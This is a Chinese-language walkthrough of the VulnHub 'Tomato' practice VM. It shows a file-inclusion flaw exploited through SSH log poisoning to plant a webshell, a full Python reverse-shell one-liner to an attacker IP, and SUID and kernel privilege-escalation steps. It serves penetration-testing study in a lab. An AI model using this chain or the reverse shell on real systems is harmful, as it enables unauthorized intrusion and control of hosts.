靶场搭建

靶场下载地址：https://download.vulnhub.com/tomato/Tomato.ova

下载下来是zip压缩文件，解压后是.ovf虚拟机压缩文件直接用Vmvare导出就行

打开后把网络模式设置为NAT模式（桥接模式也可以,和kali攻击机保持一致就可以）

启动虚拟机

靶场搭建完毕

渗透测试

由于不知道靶机ip，所以需要扫描NAT的网段

147为kaii，所以158为靶机ip

扫描靶机端口服务开放情况

开放了21端口，存在FTP服务，且为vsftpd 3.0.3

开放了80端口，存在HTTP服务，中间件为Apache 2.4.18

开放了2211端口，存在SSH服务

开放了8888端口，存在HTTP服务，中间件为Nginx 1.10.3

先访问一下WEB

首页为一张图片

搜索一下敏感目录

没有发现什么敏感目录

扩大字典搜索敏感目录和文件

发现/antibot_image/目录

发现info.php为php探针

查看源码发现有一段注释的文件包含的代码

所以猜测存在image参数为包含文件参数

尝试包含/etc/passwd

发现果然存在包含参数，且存在任意文件包含漏洞

找到可以登录的用户tomato

尝试进行ssh登录暴力破解，没有成功

产生过hi包含公私钥文件，发现不存在

在php探针中发现没有开启远程文件包含

所以只能使用其它利用思路，尝试读取源码

发现也无法读取到源码

所以现在利用思路只剩下配合写入的webshell，通过文件包含来获取shell

所以需要查找写入点或者文件上传点

可以尝试通过日志写入

尝试通过WEB日志、SSH日志、FTP日志

WEB日志和FTP日志都尝试失败

通过SSH日志

发现成功包含了SSH的日志

所以我们尝试写入webshell

包含这个文件，发现成功执行命令

利用webshell反弹shell

存在nc，也存在python3

监听端口，执行以下命令反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.52.147",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

成功反弹shell

查看所有目录，没有发现其它线索

进行提权

sudo提权

需要密码无法使用

查找看有没有权限配置错误的文件，属于其他用户，但当前用户可以修改执行的文件

find / -type f -user tomato -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

都没有发现

SUID提权

SUID可以让程序调用者以文件拥有者的身份运行该文件，当我们以一个普通用户去运行一个root用户所有的SUID文件，那么运行该文件我们就可以获取到root权限

通过命令

find / -perm -4000 2>/dev/null查看是否具有root权限的文件

常用可利用的文件

nmap

vim

find

bash

less

nano

awk

都不能利用

内核提权

发现存在相应漏洞

查看文件，有用法

上传文件

编译文件，执行文件

发现没有gcc

所以在攻击机上编译好后上传

但是编译失败

再尝试其它漏洞

将利用文档复制下来查看

找到使用方法和下载地址

下载文件，解压

编译，上传文件

发现也需要gcc，所以失败

再尝试其它的

复制下来，查看使用方式

编译后上传

赋予权限，执行

获得到最后一个flag

VulnHub Tomato相关推荐

vulnhub靶场，Tomato
vulnhub靶场,Tomato 环境准备靶机下载地址:https://www.vulnhub.com/entry/tomato-1,557/ 攻击机:kali(192.168.109.128) 靶 ...
vulnhub靶场-tomato渗透测试
靶机名称:tomato 虚拟机环境:VMware Workstation 16 Pro 目标:获取root权限,然后获取/root下的flag 靶机地址 Tomato: 1 ~ VulnHub kal ...
vulnhub之tomato（西红柿）
目录一.主机发现二.端口扫描三.服务版本发现四.信息收集五.扩大供给面扫描目录 1.dirsearch常规字典 2.gobuster 六./antibot_image信息收集七.文件包含 ...
【每日打靶练习】vulnhub靶机平台--Funbox2（低）
Funbox靶场练习--低 0x00部署 0x01信息收集 1.主机发现 2.端口扫描 3.信息收集 0x03漏洞挖掘 1.FTP服务漏洞 2.密码爆破(john) 3.SSH公钥认证 4.rbash ...
渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程！
Android4靶机简介名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
路由器刷机常见第三方固件及管理前端种类(OpenWrt、Tomato、DD-Wrt)
路由器刷机常见第三方固件及管理前端种类(OpenWrt.Tomato.DD-Wrt) 目前路由器折腾刷机,除了采用各品牌的原厂固件外,第三方路由器固件,基本就是:Tomato.DD-WRT.OpenW ...
主流路由器固件dd-wrt,tomato,openwrt对比介绍
流行的第三方路由固件,主要有DDWRT,Tomato,Openwrt.当然还有其他一些更加小众的版本,和很多从这三大固件衍生出来的修改版固件.我的这篇文章,可以让大家对这些固件有一个相对比较全面的理解 ...
Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息信息收集主机发现主机存活扫描端口扫描网站信息网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例（一）
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

VulnHub Tomato

靶场搭建

渗透测试

VulnHub Tomato相关推荐

最新文章

热门文章